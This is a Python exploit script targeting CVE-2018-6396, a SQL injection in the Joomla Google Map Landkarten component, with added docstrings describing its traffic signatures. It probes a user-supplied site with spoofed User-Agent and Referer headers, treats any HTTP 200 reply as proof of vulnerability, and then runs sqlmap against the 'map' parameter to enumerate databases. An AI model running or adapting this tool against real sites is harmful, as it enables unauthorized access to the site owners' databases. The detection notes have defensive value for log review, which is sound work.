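#!/usr/bin/python3
"""Probe a Joomla! site for the Google Map Landkarten component endpoint.

The banner ties this script to CVE-2018-6396 (SQL injection in the component,
versions <= 4.2.3).  It sends one GET request to the component URL in ``P``
and, when the server answers HTTP 200, hands the URL to sqlmap with ``map`` as
the tested parameter.

Detection notes, all taken from the code below:

* The request path always carries ``option=com_gmap&view=gm_modal`` and a
  ``map`` parameter.
* The User-Agent is synthetic (see ``UserAgent``).
* The Referer is ``http://www.google.com/?q=`` plus 5-10 uppercase letters.
* ``Keep-Alive`` is a number from 110 to 120.
"""

#IMPORTS
import os
import sys
import random
import subprocess
import requests
import argparse


#CLASS
class Colors:
    """ANSI escape sequences used to colour terminal output."""

    BLUE = '\033[94m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    WHITE = '\033[37m'


#Class from https://raw.githubusercontent.com/ankayip41/random-user-agent/master/ua.py
class UserAgent:
    """Build a random, synthetic User-Agent string.

    The platform, OS token and browser are drawn independently, so the result
    can pair values that never occur together in real traffic (for example a
    ``68K`` OS token with a Chrome product token).  That mismatch is a usable
    signal when reviewing web-server logs.
    """

    def __init__(self):
        # Per-instance state: the original kept this dict on the class, where
        # every instance would have shared and overwritten the same mapping.
        self.agent = {}

    def random(self):
        """Return a User-Agent string for a freshly drawn platform and browser."""
        self.get_platform()
        self.get_os()
        self.get_browser()

        browser = self.agent['browser']
        os_token = self.agent['os']

        if browser == 'Chrome':
            webkit = str(random.randint(500, 599))
            version = "%s.0%s.%s" % (
                str(random.randint(0, 24)),
                str(random.randint(0, 1500)),
                str(random.randint(0, 999)),
            )
            return "Mozilla/5.0 (%s) AppleWebKit/%s.0 (KHTML, like Gecko) Chrome/%s Safari/%s" % (
                os_token, webkit, version, webkit)
        elif browser == 'Firefox':
            year = str(random.randint(2000, 2015))
            month = str(random.randint(1, 12)).zfill(2)
            day = str(random.randint(1, 28)).zfill(2)
            gecko = "%s%s%s" % (year, month, day)
            version = "%s.0" % (str(random.randint(1, 15)))
            return "Mozilla/5.0 (%s; rv:%s) Gecko/%s Firefox/%s" % (
                os_token, version, gecko, version)
        elif browser == 'IE':
            version = "%s.0" % (str(random.randint(1, 10)))
            engine = "%s.0" % (str(random.randint(1, 5)))
            # Half of the time an extra compatibility token is inserted.
            if random.choice([True, False]):
                token = "%s;" % (random.choice(
                    ['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']))
            else:
                token = ''
            return "Mozilla/5.0 (compatible; MSIE %s; %s; %sTrident/%s)" % (
                version, os_token, token, engine)

    def get_os(self):
        """Pick an OS token that belongs to the previously chosen platform."""
        platform = self.agent['platform']
        if platform == 'Machintosh':
            self.agent['os'] = random.choice(['68K', 'PPC'])
        elif platform == 'Windows':
            self.agent['os'] = random.choice([
                'Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0',
                'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0',
                'Windows NT 6.1', 'Windows NT 6.2', 'Win95', 'Win98',
                'Win 9x 4.90', 'WindowsCE'])
        elif platform == 'X11':
            self.agent['os'] = random.choice(['Linux i686', 'Linux x86_64'])

    def get_browser(self):
        """Pick the browser family used to format the string."""
        self.agent['browser'] = random.choice(['Chrome', 'Firefox', 'IE'])

    def get_platform(self):
        """Pick the platform that decides which OS tokens are eligible."""
        self.agent['platform'] = random.choice(['Machintosh', 'Windows', 'X11'])


#GLOBAL VARS
UA = UserAgent()
HOST = ""
URL = ""
ARGS = ""
# Component endpoint requested by the probe; `map` is the parameter later
# handed to sqlmap.
P = "/index.php?option=com_gmap&view=gm_modal&tmpl=component&layout=default&map=1"


#FUNCTIONS
def banner():
    """Clear the terminal and print the banner with credits and the CVE id."""
    os.system("clear")
    # Raw string: the art contains backslashes that are not escape sequences.
    # The inner spacing of the art is reproduced as found in this copy.
    print(Colors.BLUE + Colors.BOLD + r"""
 _______ _______ ______ __ __ ______ _______ _______ _______ _______ _______
| | | _ | | |/ | __ \ | | | |_ _| ___| __|
| | | ---| <| __/ | | | | | | ___|__ |
|___|___|___|___|______|__|\__|___| |_______|__|____| |___| |_______|_______|

==================[ Javier Olmedo - contacto@hackpuntes.com ]==================
https://hackpuntes.com
https://twitter.com/jjavierolmedo
[03/03/2018]
Discovered by: @ihsansencan
Joomla! Component Google Map Landkarten <= 4.2.3 - SQL Injection Exploit
CVE-2018-6396
""" + Colors.ENDC)


def usage():
    """Print the short usage text."""
    print("""
EXAMPLE:
    -u      [REQUIRED] Specify the URL of the target to attack
    python3 joomla-cve-2018-6396.py -u
""")


def parserArguments():
    """Parse the command line into the module-level ``ARGS`` namespace."""
    global ARGS
    parser = argparse.ArgumentParser()
    # Drops the last default argument group so the help output shows the
    # custom "required arguments" group instead.  This uses a private
    # attribute of argparse.
    parser._action_groups.pop()
    required = parser.add_argument_group('required arguments')
    # argparse itself does not enforce -u; the main block checks for it.
    required.add_argument("-u", help="specify the URL of the target to attack")
    ARGS = parser.parse_args()


def randomString(size):
    """Return ``size`` random uppercase ASCII letters (code points 65-90)."""
    return ''.join(chr(random.randint(65, 90)) for _ in range(size))


def isVulnerable():
    """Request the component URL and report whether the server answered 200.

    Side effects: normalises ``HOST`` through ``formatTarget()`` and stores
    the full probe address in the module-level ``URL``.

    NOTE(review): an HTTP 200 only shows that the endpoint responds.  It does
    not confirm the injection, so a patched or unrelated site that returns 200
    for this path is still reported as vulnerable.

    Returns:
        True when the response status is 200, otherwise False (including when
        the request itself fails).
    """
    global URL

    formatTarget()
    headers = {
        'User-Agent': UA.random(),
        'Cache-Control': 'no-cache',
        'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
        'Referer': 'http://www.google.com/?q=' + randomString(random.randint(5, 10)),
        'Keep-Alive': str(random.randint(110, 120)),
        'Connection': 'keep-alive'
    }
    URL = HOST + P
    print(Colors.BOLD + Colors.GREEN + "[+]" + " Checking if " + Colors.YELLOW + HOST +
          Colors.GREEN + " is vulnerable" + Colors.ENDC)
    try:
        response = requests.get(URL, headers=headers, timeout=10)
    except requests.RequestException as err:
        # The original wrote status_code = 500 onto the `requests` module
        # itself to signal failure; report the error and return instead.
        print(Colors.BOLD + Colors.RED + "[-]" + " Request failed: " + str(err) + Colors.ENDC)
        return False
    return response.status_code == 200


def formatTarget():
    """Strip one trailing slash from ``HOST`` and make sure it has a scheme.

    When ``HOST`` has no ``http://`` or ``https://`` prefix the user is asked
    which scheme to prepend.  The original condition joined the two prefix
    tests with ``or``, which is always true, so a URL that already had a
    scheme was prompted for anyway and received a second prefix.
    """
    global HOST
    if HOST.endswith("/"):
        HOST = HOST[:-1]
    if HOST.startswith(("http://", "https://")):
        return

    print(Colors.BOLD + Colors.GREEN + "[1]" + Colors.YELLOW + " http://" + HOST + Colors.ENDC)
    print(Colors.BOLD + Colors.GREEN + "[2]" + Colors.YELLOW + " https://" + HOST + Colors.ENDC)
    print()
    while True:
        myTarget = input(Colors.BOLD + Colors.YELLOW + "[!]" + Colors.WHITE + " Select your " +
                         Colors.RED + "TARGET: " + Colors.GREEN)
        if myTarget == "1":
            HOST = "http://" + HOST
            break
        elif myTarget == "2":
            HOST = "https://" + HOST
            break
        else:
            # Move the cursor up one line and erase it so the prompt is
            # redrawn in place after an invalid answer.
            sys.stdout.write("\033[F")
            sys.stdout.write("\033[K" + Colors.ENDC)
    print()


#MAIN
if __name__ == "__main__":
    banner()
    usage()
    parserArguments()
    if ARGS.u:
        HOST = ARGS.u
        if isVulnerable():
            print(Colors.BOLD + Colors.GREEN + "[+]" + " TARGET " + Colors.YELLOW + HOST +
                  Colors.GREEN + " VULNERABLE!! :)" + Colors.ENDC)
            print()
            print(Colors.BOLD + Colors.GREEN + "[+]" + " LAUNCHING ATTACK SQLi with SQLmap!!" +
                  Colors.ENDC)
            # Pass an argument vector rather than a shell string: the URL
            # comes from the command line, and quotes or shell metacharacters
            # in it would otherwise be interpreted by the local shell.
            try:
                subprocess.run(["sqlmap", "-u", URL, "-p", "map", "--dbs"], check=False)
            except FileNotFoundError:
                print(Colors.BOLD + Colors.RED + "[!] " + "sqlmap not found in PATH" + Colors.ENDC)
                sys.exit(1)
        else:
            print(Colors.BOLD + Colors.RED + "[-]" + " TARGET " + Colors.YELLOW + HOST +
                  Colors.RED + " NOT VULNERABLE!! :(" + Colors.ENDC)
            print()
            sys.exit(1)
    else:
        print(Colors.BOLD + Colors.RED + "[!] " + "Arguments not found!!" + Colors.ENDC)
        print("")
        sys.exit(1)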